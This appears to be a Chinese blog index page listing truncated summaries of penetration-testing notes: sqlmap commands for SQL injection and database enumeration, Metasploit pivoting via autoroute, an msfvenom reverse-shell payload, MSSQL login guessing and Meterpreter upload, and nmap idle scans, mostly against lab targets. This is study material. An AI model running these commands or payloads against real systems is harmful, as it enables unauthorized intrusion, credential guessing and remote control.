摘要: 查询是否存在注入 sqlmap.py -u url 检测多个url sqlmap -m target.txt 查询当前用户下的所有数据库 sqlmap.py -u url --dbs dkeye数据库中的列表名 -D dkeye --tables 查询字段名 -D dkeye -T user --c 阅读全文
posted @ 2021-03-13 17:45 妖涟 阅读(32) 评论(0) 推荐(0)
摘要: 内网代理 建立在已经成功获取一个session3的情况下 1、配置路由 #配置静态路由让这个session3来转发访问192.168.52.0/24这个网段的所有流量 msf > run autoroute -s 192.168.52.0/24 2、使用background命令将该shell放在后台 阅读全文
posted @ 2021-03-13 17:17 妖涟 阅读(2236) 评论(0) 推荐(1)
摘要: 使用Metasploit对Metasploitable2靶机进行渗透 使用Vmware打开解压后的文件,进入系统后的默认用户名和密码为 msfadmin 登录成功后使用 ifconfig 查看靶机ip地址为 192.168.188.134 在kali中打开msf 输入 search portscan 阅读全文
posted @ 2021-03-06 21:07 妖涟 阅读(566) 评论(0) 推荐(0)
摘要: 使用MSF攻击载荷生成器创建可独立运行的二进制文件 #创建一个简单的反弹shell程序,它能够回连到攻击机,并弹出一个命令行shell #载入攻击载荷并用--payload-options选项查看可用参数 msfvenom -p windows/shell_reverse_tcp --payload 阅读全文
posted @ 2021-03-06 16:42 妖涟 阅读(109) 评论(0) 推荐(0)
摘要: 若对mssql进行攻击,先使用mssql_ping模块找到MS SQL服务,并使用mssql_login模块猜解出MS SQL 用户的口令,然后使用mssql_payload模块与MS SQL交互并上传Meterpreter shell,从而实现了对系统的完整入侵过程 权限提升 在windows的目 阅读全文
posted @ 2021-03-06 16:01 妖涟 阅读(92) 评论(0) 推荐(0)
摘要: 全端口攻击载荷:暴力猜解目标开放的 端口 如果攻击的组织内部设置了严格的出站端口过滤,则可以使用reverse_tcp_allports攻击载荷对所有可用的端口进行尝试 资源文件 在MSF终端中指定资源文件的名字,文件中的命令个逐条被自动执行 #可以在MSF终端中使用过resource命令载入资源文 阅读全文
posted @ 2021-03-06 13:54 妖涟 阅读(74) 评论(0) 推荐(0)
摘要: 1.1在MSF控制台中运行Nexpose #删除Metasploit中现有的数据库,并创建一个新的数据库,载入Nexpose插件 msf > db_destroy postgres:toor@127.0.0.1/msf msf > db_connect postgres:toor@127.0.0.1 阅读全文
posted @ 2021-03-05 23:27 妖涟 阅读(99) 评论(0) 推荐(0)
摘要: 主动信息收集 1.1 使用nmap进行端口扫描 namp -sS -Pn -A 192.168.118.134 得到目标信息 TCP空闲扫描,可以冒充网络上另一台主机的IP地址,对目标进行更为隐秘的扫描 #使用模块寻找能够满足TCP空闲扫描要求的空闲主机 msf > use auxiliary/sc 阅读全文
posted @ 2021-03-05 22:53 妖涟 阅读(80) 评论(0) 推荐(0)